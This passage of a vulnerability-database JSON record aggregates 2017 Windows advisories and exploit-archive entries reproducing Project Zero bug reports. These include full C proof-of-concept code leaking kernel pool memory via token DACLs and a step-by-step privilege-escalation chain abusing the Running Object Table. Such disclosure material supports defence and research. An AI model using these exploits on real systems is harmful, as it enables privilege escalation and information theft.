arbitrary code with elevated privileges.", "cvss3": {"exploitabilityScore": 1.0, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "baseScore": 4.7, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2017-05-09T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft Windows COM Elevation of Privilege (CVE-2017-0213)", "bulletinFamily": "info", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 1.9, "vectorString": "AV:L/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0213"], "modified": "2017-05-09T00:00:00", "id": "CPAI-2017-0379", "href": "", "cvss": {"score": 1.9, "vector": "AV:L/AC:M/Au:N/C:N/I:P/A:N"}}], "symantec": [{"lastseen": "2021-06-08T19:05:25", "description": "### Description\n\nMicrosoft Windows is prone to a local information-disclosure vulnerability. A local attacker can leverage this issue to disclose sensitive information that may aid in further attacks.\n\n### Technologies Affected\n\n * Microsoft Windows 10 Version 1607 for 32-bit Systems \n * Microsoft Windows 10 Version 1607 for x64-based Systems \n * Microsoft Windows 10 for 32-bit Systems \n * Microsoft Windows 10 for x64-based Systems \n * Microsoft Windows 10 version 1511 for 32-bit Systems \n * Microsoft Windows 10 version 1511 for x64-based Systems \n * Microsoft Windows 10 version 1703 for 32-bit Systems \n * Microsoft Windows 10 version 1703 for x64-based Systems \n * Microsoft Windows 7 for 32-bit Systems SP1 \n * Microsoft Windows 7 for x64-based Systems SP1 \n * Microsoft Windows 8.1 for 32-bit Systems \n * Microsoft Windows 8.1 for x64-based Systems \n * Microsoft Windows RT 8.1 \n * Microsoft Windows Server 2008 R2 for Itanium-based Systems SP1 \n * Microsoft Windows Server 2008 R2 for x64-based Systems SP1 \n * Microsoft Windows Server 2008 for 32-bit Systems SP2 \n * Microsoft Windows Server 2008 for Itanium-based Systems SP2 \n * Microsoft Windows Server 2008 for x64-based Systems SP2 \n * Microsoft Windows Server 2012 \n * Microsoft Windows Server 2012 R2 \n * Microsoft Windows Server 2016 \n\n### Recommendations\n\n**Permit local access for trusted individuals only. Where possible, use restricted environments and restricted shells.** \nEnsure that only trusted users have local, interactive access to affected computers.\n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "edition": 2, "cvss3": {}, "published": "2017-05-09T00:00:00", "type": "symantec", "title": "Microsoft Windows Kernel CVE-2017-0258 Local Information Disclosure Vulnerability", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2017-0258"], "modified": "2017-05-09T00:00:00", "id": "SMNTC-98112", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/98112", "cvss": {"score": 1.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2021-06-08T19:05:26", "description": "### Description\n\nMicrosoft Windows is prone to a local privilege-escalation vulnerability. A local attacker can leverage this issue to execute arbitrary code with elevated privileges.\n\n### Technologies Affected\n\n * Microsoft Windows 10 Version 1607 for 32-bit Systems \n * Microsoft Windows 10 Version 1607 for x64-based Systems \n * Microsoft Windows 10 for 32-bit Systems \n * Microsoft Windows 10 for x64-based Systems \n * Microsoft Windows 10 version 1511 for 32-bit Systems \n * Microsoft Windows 10 version 1511 for x64-based Systems \n * Microsoft Windows 10 version 1703 for 32-bit Systems \n * Microsoft Windows 10 version 1703 for x64-based Systems \n * Microsoft Windows 7 for 32-bit Systems SP1 \n * Microsoft Windows 7 for x64-based Systems SP1 \n * Microsoft Windows 8.1 for 32-bit Systems \n * Microsoft Windows 8.1 for x64-based Systems \n * Microsoft Windows RT 8.1 \n * Microsoft Windows Server 2008 R2 for Itanium-based Systems SP1 \n * Microsoft Windows Server 2008 R2 for x64-based Systems SP1 \n * Microsoft Windows Server 2008 for 32-bit Systems SP2 \n * Microsoft Windows Server 2008 for Itanium-based Systems SP2 \n * Microsoft Windows Server 2008 for x64-based Systems SP2 \n * Microsoft Windows Server 2012 \n * Microsoft Windows Server 2012 R2 \n * Microsoft Windows Server 2016 \n\n### Recommendations\n\n**Permit local access for trusted individuals only. Where possible, use restricted environments and restricted shells.** \nEnsure that only trusted users have local, interactive access to affected computers.\n\n**Implement multiple redundant layers of security.** \nSince this issue may be leveraged to execute code, we recommend memory-protection schemes, such as non-executable stack/heap configurations and randomly mapped memory segments. This tactic may complicate exploits of memory-corruption vulnerabilities.\n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "edition": 2, "cvss3": {}, "published": "2017-05-09T00:00:00", "type": "symantec", "title": "Microsoft Windows COM CVE-2017-0214 Local Privilege Escalation Vulnerability", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2017-0214"], "modified": "2017-05-09T00:00:00", "id": "SMNTC-98103", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/98103", "cvss": {"score": 4.4, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2021-06-08T19:05:25", "bulletinFamily": "software", "cvelist": ["CVE-2017-0244"], "description": "### Description\n\nMicrosoft Windows is prone to a local privilege-escalation vulnerability. A local attacker can exploit this issue to execute arbitrary code in kernel mode with elevated privileges.\n\n### Technologies Affected\n\n * Microsoft Windows 7 for 32-bit Systems SP1 \n * Microsoft Windows 7 for x64-based Systems SP1 \n * Microsoft Windows Server 2008 R2 for Itanium-based Systems SP1 \n * Microsoft Windows Server 2008 R2 for x64-based Systems SP1 \n * Microsoft Windows Server 2008 for 32-bit Systems SP2 \n * Microsoft Windows Server 2008 for Itanium-based Systems SP2 \n * Microsoft Windows Server 2008 for x64-based Systems SP2 \n\n### Recommendations\n\n**Permit local access for trusted individuals only. Where possible, use restricted environments and restricted shells.** \nTo exploit this vulnerability, an attacker requires local access to an affected computer. Grant local access for trusted and accountable users only.\n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "edition": 2, "modified": "2017-05-09T00:00:00", "id": "SMNTC-98109", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/98109", "published": "2017-05-09T00:00:00", "type": "symantec", "title": "Microsoft Windows Kernel CVE-2017-0244 Local Privilege Escalation Vulnerability", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-06-08T19:05:26", "description": "### Description\n\nMicrosoft Windows is prone to a local privilege-escalation vulnerability. A local attacker can exploit this issue to execute arbitrary code within the context of the application.\n\n### Technologies Affected\n\n * Microsoft Windows 10 Version 1607 for 32-bit Systems \n * Microsoft Windows 10 Version 1607 for x64-based Systems \n * Microsoft Windows 10 for 32-bit Systems \n * Microsoft Windows 10 for x64-based Systems \n * Microsoft Windows 10 version 1511 for 32-bit Systems \n * Microsoft Windows 10 version 1511 for x64-based Systems \n * Microsoft Windows 10 version 1703 for 32-bit Systems \n * Microsoft Windows 10 version 1703 for x64-based Systems \n * Microsoft Windows 7 for 32-bit Systems SP1 \n * Microsoft Windows 7 for x64-based Systems SP1 \n * Microsoft Windows 8.1 for 32-bit Systems \n * Microsoft Windows 8.1 for x64-based Systems \n * Microsoft Windows RT 8.1 \n * Microsoft Windows Server 2008 R2 for Itanium-based Systems SP1 \n * Microsoft Windows Server 2008 R2 for x64-based Systems SP1 \n * Microsoft Windows Server 2008 for 32-bit Systems SP2 \n * Microsoft Windows Server 2008 for Itanium-based Systems SP2 \n * Microsoft Windows Server 2008 for x64-based Systems SP2 \n * Microsoft Windows Server 2012 \n * Microsoft Windows Server 2012 R2 \n * Microsoft Windows Server 2016 \n\n### Recommendations\n\n**Permit local access for trusted individuals only. Where possible, use restricted environments and restricted shells.** \nTo exploit this vulnerability, an attacker requires local access to an affected computer. Grant local access for trusted and accountable users only.\n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "edition": 2, "cvss3": {}, "published": "2017-05-09T00:00:00", "type": "symantec", "title": "Microsoft Windows COM CVE-2017-0213 Local Privilege Escalation Vulnerability", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2017-0213"], "modified": "2017-05-09T00:00:00", "id": "SMNTC-98102", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/98102", "cvss": {"score": 1.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}], "zdt": [{"lastseen": "2018-04-10T07:41:06", "description": "Exploit for windows platform in category dos / poc", "cvss3": {}, "published": "2017-05-16T00:00:00", "type": "zdt", "title": "Microsoft Windows 7 Kernel - Uninitialized Memory in the Default dacl Descriptor of System Processes", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-0258"], "modified": "2017-05-16T00:00:00", "id": "1337DAY-ID-27776", "href": "https://0day.today/exploit/description/27776", "sourceData": "/*\r\nSource: https://bugs.chromium.org/p/project-zero/issues/detail?id=1145\r\n \r\nWe have observed (on Windows 7 32-bit) that for unclear reasons, the kernel-mode structure containing the default DACL of system processes' tokens (lsass.exe, services.exe, ...) has 8 uninitialized bytes at the end, as the size of the structure (ACL.AclSize) is larger than the sum of ACE lengths (ACE_HEADER.AceSize). It is possible to read the leftover pool data using a GetTokenInformation(TokenDefaultDacl) call.\r\n \r\nWhen the attached proof-of-concept code is run against a SYSTEM process (pid of the process must be passed in the program argument), on a system with Special Pools enabled for ntoskrnl.exe, output similar to the following can be observed:\r\n \r\n>NtQueryInformationToken.exe 520\r\n00000000: 54 bf 2b 00 02 00 3c 00 02 00 00 00 00 00 14 00 T.+...<.........\r\n00000010: 00 00 00 10 01 01 00 00 00 00 00 05 12 00 00 00 ................\r\n00000020: 00 00 18 00 00 00 02 a0 01 02 00 00 00 00 00 05 ................\r\n00000030: 20 00 00 00 20 02 00 00[01 01 01 01 01 01 01 01] ... ...........\r\n \r\nThe last eight 0x01 bytes are markers inserted by Special Pools, which visibly haven't been overwritten by any actual data prior to being returned to user-mode.\r\n \r\nWhile reading DACLs of system processes may require special privileges (such as the ability to acquire SeDebugPrivilege), the root cause of the behavior could potentially make it possible to also create uninitialized DACLs that are easily accessible by regular users. This could in turn lead to a typical kernel memory disclosure condition, which would allow local authenticated attackers to defeat certain exploit mitigations (kernel ASLR) or read other secrets stored in the kernel address space. Since it's not clear to us what causes the abberant behavior, we're reporting it for further analysis to be on the safe side.\r\n \r\nThe proof-of-concept code is mostly based on the example at https://support.microsoft.com/en-us/help/131065/how-to-obtain-a-handle-to-any-process-with-sedebugprivilege.\r\n*/\r\n \r\n#define RTN_OK 0\r\n#define RTN_USAGE 1\r\n#define RTN_ERROR 13\r\n \r\n#include <windows.h>\r\n#include <stdio.h>\r\n \r\nBOOL SetPrivilege(\r\n HANDLE hToken, // token handle\r\n LPCTSTR Privilege, // Privilege to enable/disable\r\n BOOL bEnablePrivilege // TRUE to enable. FALSE to disable\r\n );\r\n \r\nvoid DisplayError(LPTSTR szAPI);\r\nVOID PrintHex(PBYTE Data, ULONG dwBytes);\r\n \r\nint main(int argc, char *argv[])\r\n{\r\n HANDLE hProcess;\r\n HANDLE hToken;\r\n int dwRetVal = RTN_OK; // assume success from main()\r\n \r\n // show correct usage for kill\r\n if (argc != 2)\r\n {\r\n fprintf(stderr, \"Usage: %s [ProcessId]\\n\", argv[0]);\r\n return RTN_USAGE;\r\n }\r\n \r\n if (!OpenThreadToken(GetCurrentThread(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, FALSE, &hToken))\r\n {\r\n if (GetLastError() == ERROR_NO_TOKEN)\r\n {\r\n if (!ImpersonateSelf(SecurityImpersonation))\r\n return RTN_ERROR;\r\n \r\n if (!OpenThreadToken(GetCurrentThread(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, FALSE, &hToken)){\r\n DisplayError(L\"OpenThreadToken\");\r\n return RTN_ERROR;\r\n }\r\n }\r\n else\r\n return RTN_ERROR;\r\n }\r\n \r\n // enable SeDebugPrivilege\r\n if (!SetPrivilege(hToken, SE_DEBUG_NAME, TRUE))\r\n {\r\n DisplayError(L\"SetPrivilege\");\r\n \r\n // close token handle\r\n CloseHandle(hToken);\r\n \r\n // indicate failure\r\n return RTN_ERROR;\r\n }\r\n \r\n CloseHandle(hToken);\r\n \r\n // open the process\r\n if ((hProcess = OpenProcess(\r\n PROCESS_QUERY_INFORMATION,\r\n FALSE,\r\n atoi(argv[1]) // PID from commandline\r\n )) == NULL)\r\n {\r\n DisplayError(L\"OpenProcess\");\r\n return RTN_ERROR;\r\n }\r\n \r\n // Open process token.\r\n if (!OpenProcessToken(hProcess, TOKEN_READ, &hToken)) {\r\n DisplayError(L\"OpenProcessToken\");\r\n return RTN_ERROR;\r\n }\r\n \r\n DWORD ReturnLength = 0;\r\n if (!GetTokenInformation(hToken, TokenDefaultDacl, NULL, 0, &ReturnLength) && GetLastError() != ERROR_INSUFFICIENT_BUFFER) {\r\n DisplayError(L\"GetTokenInformation #1\");\r\n return RTN_ERROR;\r\n }\r\n \r\n PBYTE OutputBuffer = (PBYTE)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, ReturnLength);\r\n if (!GetTokenInformation(hToken, TokenDefaultDacl, OutputBuffer, ReturnLength, &ReturnLength)) {\r\n DisplayError(L\"GetTokenInformation #2\");\r\n return RTN_ERROR;\r\n }\r\n \r\n PrintHex(OutputBuffer, ReturnLength);\r\n \r\n // close handles\r\n HeapFree(GetProcessHeap(), 0, OutputBuffer);\r\n CloseHandle(hProcess);\r\n \r\n return dwRetVal;\r\n}\r\n \r\nBOOL SetPrivilege(\r\n HANDLE hToken, // token handle\r\n LPCTSTR Privilege, // Privilege to enable/disable\r\n BOOL bEnablePrivilege // TRUE to enable. FALSE to disable\r\n )\r\n{\r\n TOKEN_PRIVILEGES tp;\r\n LUID luid;\r\n TOKEN_PRIVILEGES tpPrevious;\r\n DWORD cbPrevious = sizeof(TOKEN_PRIVILEGES);\r\n \r\n if (!LookupPrivilegeValue(NULL, Privilege, &luid)) return FALSE;\r\n \r\n // \r\n // first pass. get current privilege setting\r\n // \r\n tp.PrivilegeCount = 1;\r\n tp.Privileges[0].Luid = luid;\r\n tp.Privileges[0].Attributes = 0;\r\n \r\n AdjustTokenPrivileges(\r\n hToken,\r\n FALSE,\r\n &tp,\r\n sizeof(TOKEN_PRIVILEGES),\r\n &tpPrevious,\r\n &cbPrevious\r\n );\r\n \r\n if (GetLastError() != ERROR_SUCCESS) return FALSE;\r\n \r\n // \r\n // second pass. set privilege based on previous setting\r\n // \r\n tpPrevious.PrivilegeCount = 1;\r\n tpPrevious.Privileges[0].Luid = luid;\r\n \r\n if (bEnablePrivilege) {\r\n tpPrevious.Privileges[0].Attributes |= (SE_PRIVILEGE_ENABLED);\r\n }\r\n else {\r\n tpPrevious.Privileges[0].Attributes ^= (SE_PRIVILEGE_ENABLED &\r\n tpPrevious.Privileges[0].Attributes);\r\n }\r\n \r\n AdjustTokenPrivileges(\r\n hToken,\r\n FALSE,\r\n &tpPrevious,\r\n cbPrevious,\r\n NULL,\r\n NULL\r\n );\r\n \r\n if (GetLastError() != ERROR_SUCCESS) return FALSE;\r\n \r\n return TRUE;\r\n}\r\n \r\nvoid DisplayError(\r\n LPTSTR szAPI // pointer to failed API name\r\n )\r\n{\r\n LPTSTR MessageBuffer;\r\n DWORD dwBufferLength;\r\n \r\n fwprintf(stderr, L\"%s() error!\\n\", szAPI);\r\n \r\n if (dwBufferLength = FormatMessage(\r\n FORMAT_MESSAGE_ALLOCATE_BUFFER |\r\n FORMAT_MESSAGE_FROM_SYSTEM,\r\n NULL,\r\n GetLastError(),\r\n GetSystemDefaultLangID(),\r\n (LPTSTR)&MessageBuffer,\r\n 0,\r\n NULL\r\n ))\r\n {\r\n DWORD dwBytesWritten;\r\n \r\n // \r\n // Output message string on stderr\r\n // \r\n WriteFile(\r\n GetStdHandle(STD_ERROR_HANDLE),\r\n MessageBuffer,\r\n dwBufferLength,\r\n &dwBytesWritten,\r\n NULL\r\n );\r\n \r\n // \r\n // free the buffer allocated by the system\r\n // \r\n LocalFree(MessageBuffer);\r\n }\r\n}\r\n \r\nVOID PrintHex(PBYTE Data, ULONG dwBytes) {\r\n for (ULONG i = 0; i < dwBytes; i += 16) {\r\n printf(\"%.8x: \", i);\r\n \r\n for (ULONG j = 0; j < 16; j++) {\r\n if (i + j < dwBytes) {\r\n printf(\"%.2x \", Data[i + j]);\r\n }\r\n else {\r\n printf(\"?? \");\r\n }\r\n }\r\n \r\n for (ULONG j = 0; j < 16; j++) {\r\n if (i + j < dwBytes && Data[i + j] >= 0x20 && Data[i + j] <= 0x7e) {\r\n printf(\"%c\", Data[i + j]);\r\n }\r\n else {\r\n printf(\".\");\r\n }\r\n }\r\n \r\n printf(\"\\n\");\r\n }\r\n}\n\n# 0day.today [2018-04-10] #", "sourceHref": "https://0day.today/exploit/27776", "cvss": {"score": 1.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-01-05T05:13:31", "description": "Exploit for windows platform in category local exploits", "cvss3": {}, "published": "2017-05-17T00:00:00", "type": "zdt", "title": "Microsoft Windows - Running Object Table Register ROTFLAGS_ALLOWANYCLIENT Privilege Escalation Explo", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-0214"], "modified": "2017-05-17T00:00:00", "id": "1337DAY-ID-27797", "href": "https://0day.today/exploit/description/27797", "sourceData": "Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1112\r\n \r\nWindows: Running Object Table Register ROTFLAGS_ALLOWANYCLIENT EoP\r\nPlatform: Windows 10 10586/14393 not tested 8.1 Update 2 or Windows 7\r\nClass: Elevation of Privilege\r\n \r\nSummary:\r\nBy setting an appropriate AppID it\u2019s possible for a normal user process to set a global ROT entry. This can be abused to elevate privileges.\r\n \r\nDescription:\r\n \r\nNOTE: I\u2019m not sure which part of this chain to really report. As far as I can tell it\u2019s pretty much all by design and fixing the initial vector seems difficult. Perhaps this is only a bug which can be fixed to prevent sandbox escapes?\r\n \r\nWhen registering an object in the ROT the default is to only expose that registration to the same user identity on the same desktop/window station. This includes preventing the same user at different ILs (such as between sandbox and normal user) from seeing the same registration. However it could be imagined that you might want to register an entry for all users/contexts so IRunningObjectTable::Register takes a grfFlags parameter with the value ROTFLAGS_ALLOWANYCLIENT which allows the ROT entry to be exposed to all users. \r\n \r\nThe description of this flag indicates it can only be used if the COM process is a Local Service or a RunAs application. In fact there\u2019s an explicit ROTFlags value for the AppID which would grant the privilege to a normal application. Quick testing proves this to be correct, a \u201cnormal\u201d application cannot expose the ROT entry to any client as RPCSS does a check that the calling process is allowed to expose the entry. However there are two clear problems with the check. Creating a RunAs COM object in the current session would typically run at the same privilege level as the caller, therefore an application which wanted to abuse this feature could inject code into that process. Secondly while it\u2019s not possible to register a per-user COM object which specifies a RunAs AppID it\u2019s possible to explicitly set the AppID when calling CoInitializeSecurity (either via the GUID or by naming your program to match one which maps to the correct AppID).\r\n \r\nTherefore in the current implementation effectively any process, including sandboxed ones should be able to register a global ROT entry. What can we do with this? The ROT is mainly used for OLE duties, for example Word and Visual Studio register entries for each document/project open. It would be nice not to rely on this, so instead I\u2019ll abuse another OLE component, which we\u2019ve seen before, the fact that LoadTypeLib will fall back to a moniker if it can\u2019t find the type library file specified.\r\n \r\nIf the file loading fails then LoadTypeLib will effectively call MkParseDisplayName on the passed in string. One of the things MPDN does is try and create a file moniker with the string passed in as an argument. File Monikers have an interesting feature, the COM libraries will check if there\u2019s a registered ROT entry for this file moniker already present, if it is instead of creating a new object it will call IRunningObjectTable::GetObject instead when binding. So as we can register a ROT entry for any user in any context we can provide our own implementation of ITypeLib running inside our process, by registering it against the path to the type library any other process which tries to open that library would instead get our spoofed one, assuming we can force the file open to fail.\r\n \r\nThis is the next key part, looking at the LoadTypeLib implementation the code calls FindTypeLib if this function fails the code will fall back to the moniker route. There\u2019s two opportunities here, firstly CreateFile is called on the path, we could cause this to fail by opening the file with no sharing mode, in theory it should fail. However in practice it doesn\u2019t most type libraries are in system location, if you don\u2019t have the possibility of write permission on the file the OS automatically applies FILE_SHARE_READ which makes it impossible to lock the file in its entirety. Also some TLBs are stored inside a DLL which is then used so this route is out. Instead the other route is more promising, VerifyIsExeOrTlb is called once the file is open to check the type of file to parse. This function tries to load the first 64 bytes and checks for magic signatures. We can cause the read to fail by using the LockFile API to put an exclusive lock on that part of the file. This also has the advantage that it doesn\u2019t affect file mappings so will also work with loaded DLLs. \r\n \r\nWe now can cause any user of a type library to get redirected to our \u201cfake\u201d one without abusing impersonation/symbolic link tricks. How can we use this to our advantage? The final trick is to abuse again the auto-generation of Stubs/Proxies from automation compatible interfaces. If we can get a more privileged process to use our type library when creating a COM stub we can cause a number of memory safety issues such as type confusion, arbitrary memory read/writes and extending the vtable to call arbitrary functions. This is an extremely powerful primitive, as long as you can find a more privileged process which uses a dual automation interface. For example the FlashBroker which is installed on every Win8+ machine is intentionally allowed to be created by sandboxed IE/Edge and uses dual interfaces with auto-generated Stubs. We could abuse for example the BrokerPrefSetExceptionDialogSize and BrokerPrefGetExceptionDialogSize to do arbitrary memory writes. This all works because the stub creation has no was of ensuring that the actual server implementation matches the generated stub (at least without full symbols) so it will blindly marshal pointers or call outside of the object's vtable.\r\n \r\nProof of Concept:\r\n \r\nI\u2019ve provided a PoC as a C# project. You need to compile it first. It fakes out the Windows Search Service\u2019s type library to modify the IGatherManagerAdmin2::GetBackoffReason method so that instead of marshaling a pointer to an integer for returning the caller can specify an arbitrary pointer value. When the method on the server side completes it will try and write a value to this address which will cause a Write AV. The Windows Search service would be ideal for abuse but many of the functions seem to require Administrator access to call. That\u2019s not to say you couldn\u2019t convert this into a full working exploit but I didn\u2019t.\r\n \r\n1) Compile the C# project. It should be compiled as a 64 bit executable.\r\n2) Restart the Windows Search service just to ensure it hasn\u2019t cached the stub previously. This probably isn\u2019t necessary but just to be certain.\r\n3) Attach a debugger to SearchIndexer.exe to catch the crash.\r\n4) Execute the PoC as a normal user (do not run under the VSHOST as the CoInitializeSecurity call will fail). You need to pass the path to the provided mssitlb.tlb file which has been modified appropriately.\r\n5) The service should crash trying to write a value to address 0x12345678\r\n \r\nCrash Dump:\r\n \r\n0:234> r\r\nrax=0000015ee04665a0 rbx=0000015ee0466658 rcx=0000015ee0466658\r\nrdx=0000000000000000 rsi=0000000000000004 rdi=0000000000000000\r\nrip=00007fff80e3a75d rsp=00000036541fdae0 rbp=00000036541fdb20\r\n r8=00000036541fd868 r9=0000015ee3bb50b0 r10=0000000000000000\r\nr11=0000000000000246 r12=0000015ee3c02988 r13=00000036541fe1c0\r\nr14=0000000012345678 r15=0000000000000000\r\niopl=0 nv up ei pl zr na po nc\r\ncs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246\r\nMSSRCH!CGatheringManager::GetBackoffReason+0x8d:\r\n00007fff`80e3a75d 418936 mov dword ptr [r14],esi ds:00000000`12345678=????????\r\n0:234> k\r\n # Child-SP RetAddr Call Site\r\n00 00000036`541fdae0 00007fff`b416d533 MSSRCH!CGatheringManager::GetBackoffReason+0x8d\r\n01 00000036`541fdb10 00007fff`b413b0d0 RPCRT4!Invoke+0x73\r\n02 00000036`541fdb60 00007fff`b2fa479a RPCRT4!NdrStubCall2+0x430\r\n03 00000036`541fe180 00007fff`b3853c93 combase!CStdStubBuffer_Invoke+0x9a [d:\\th\\com\\combase\\ndr\\ndrole\\stub.cxx @ 1446]\r\n04 00000036`541fe1c0 00007fff`b305ccf2 OLEAUT32!CUnivStubWrapper::Invoke+0x53\r\n05 (Inline Function) --------`-------- combase!InvokeStubWithExceptionPolicyAndTracing::__l7::<lambda_b8ffcec6d47a5635f374132234a8dd15>::operator()+0x42 [d:\\th\\com\\combase\\dcomrem\\channelb.cxx @ 1805]\r\n06 00000036`541fe210 00007fff`b3001885 combase!ObjectMethodExceptionHandlingAction<<lambda_b8ffcec6d47a5635f374132234a8dd15> >+0x72 [d:\\th\\com\\combase\\dcomrem\\excepn.hxx @ 91]\r\n07 (Inline Function) --------`-------- combase!InvokeStubWithExceptionPolicyAndTracing+0x9e [d:\\th\\com\\combase\\dcomrem\\channelb.cxx @ 1808]\r\n08 00000036`541fe280 00007fff`b3006194 combase!DefaultStubInvoke+0x275 [d:\\th\\com\\combase\\dcomrem\\channelb.cxx @ 1880]\r\n09 (Inline Function) --------`-------- combase!SyncStubCall::Invoke+0x1b [d:\\th\\com\\combase\\dcomrem\\channelb.cxx @ 1934]\r\n0a (Inline Function) --------`-------- combase!SyncServerCall::StubInvoke+0x1b [d:\\th\\com\\combase\\dcomrem\\servercall.hpp @ 736]\r\n0b (Inline Function) --------`-------- combase!StubInvoke+0x297 [d:\\th\\com\\combase\\dcomrem\\channelb.cxx @ 2154]\r\n0c 00000036`541fe4a0 00007fff`b3008b47 combase!ServerCall::ContextInvoke+0x464 [d:\\th\\com\\combase\\dcomrem\\ctxchnl.cxx @ 1568]\r\n0d (Inline Function) --------`-------- combase!CServerChannel::ContextInvoke+0x83 [d:\\th\\com\\combase\\dcomrem\\ctxchnl.cxx @ 1458]\r\n0e (Inline Function) --------`-------- combase!DefaultInvokeInApartment+0x9e [d:\\th\\com\\combase\\dcomrem\\callctrl.cxx @ 3438]\r\n0f 00000036`541fe770 00007fff`b3007ccd combase!AppInvoke+0x8a7 [d:\\th\\com\\combase\\dcomrem\\channelb.cxx @ 1618]\r\n10 00000036`541fe8a0 00007fff`b300b654 combase!ComInvokeWithLockAndIPID+0xb2d [d:\\th\\com\\combase\\dcomrem\\channelb.cxx @ 2686]\r\n11 00000036`541feb30 00007fff`b40fd433 combase!ThreadInvoke+0x1724 [d:\\th\\com\\combase\\dcomrem\\channelb.cxx @ 6954]\r\n12 00000036`541fedc0 00007fff`b40fbed8 RPCRT4!DispatchToStubInCNoAvrf+0x33\r\n13 00000036`541fee10 00007fff`b40fcf04 RPCRT4!RPC_INTERFACE::DispatchToStubWorker+0x288\r\n14 00000036`541fef10 00007fff`b40f922d RPCRT4!RPC_INTERFACE::DispatchToStubWithObject+0x404\r\n15 00000036`541fefb0 00007fff`b40f9da9 RPCRT4!LRPC_SCALL::DispatchRequest+0x35d\r\n16 00000036`541ff090 00007fff`b40f64dc RPCRT4!LRPC_SCALL::HandleRequest+0x829\r\n17 00000036`541ff180 00007fff`b40f48c9 RPCRT4!LRPC_SASSOCIATION::HandleRequest+0x45c\r\n18 00000036`541ff200 00007fff`b411eaca RPCRT4!LRPC_ADDRESS::ProcessIO+0xb29\r\n19 00000036`541ff350 00007fff`b422e490 RPCRT4!LrpcIoComplete+0x10a\r\n1a 00000036`541ff3f0 00007fff`b422bc66 ntdll!TppAlpcpExecuteCallback+0x360\r\n1b 00000036`541ff4a0 00007fff`b34b8102 ntdll!TppWorkerThread+0x916\r\n1c 00000036`541ff8b0 00007fff`b425c5b4 KERNEL32!BaseThreadInitThunk+0x22\r\n1d 00000036`541ff8e0 00000000`00000000 ntdll!RtlUserThreadStart+0x34\r\n \r\nExpected Result:\r\nNot doing what ever it did.\r\n \r\nObserved Result:\r\nIt did it!\r\n \r\n \r\nProof of Concept:\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42021.zip\n\n# 0day.today [2018-01-05] #", "sourceHref": "https://0day.today/exploit/27797", "cvss": {"score": 4.4, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-02-21T15:35:29", "description": "Exploit for windows platform in category local exploits", "cvss3": {}, "published": "2017-05-17T00:00:00", "type": "zdt", "title": "Microsoft Windows - COM Aggregate Marshaler/IRemUnknown2 Type Confusion Privilege Escalation Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-0213"], "modified": "2017-05-17T00:00:00", "id": "1337DAY-ID-27798", "href": "https://0day.today/exploit/description/27798", "sourceData": "/*\r\nSource: https://bugs.chromium.org/p/project-zero/issues/detail?id=1107\r\n \r\nWindows: COM Aggregate Marshaler/IRemUnknown2 Type Confusion EoP\r\nPlatform: Windows 10 10586/14393 not tested 8.1 Update 2\r\nClass: Elevation of Privilege\r\n \r\nSummary:\r\nWhen accessing an OOP COM object using IRemUnknown2 the local unmarshaled proxy can be for a different interface to that requested by QueryInterface resulting in a type confusion which can result in EoP.\r\n \r\nDescription:\r\n \r\nQuerying for an IID on a OOP (or remote) COM object calls the ORPC method RemQueryInterface or RemQueryInterface2 on the default proxy. This request is passed to the remote object which queries the implementation object and if successful returns a marshaled representation of that interface to the caller. \r\n \r\nThe difference between RemQueryInterface and RemQueryInterface2 (RQI2) is how the objects are passed back to the caller. For RemQueryInterface the interface is passed back as a STDOBJREF which only contains the basic OXID/OID/IPID information to connect back. RemQueryInterface2 on the other hand passes back MInterfacePointer structures which is an entire OBJREF. The rationale, as far as I can tell, is that RQI2 is used for implementing in-process handlers, some interfaces can be marshaled using the standard marshaler and others can be custom marshaled. This is exposed 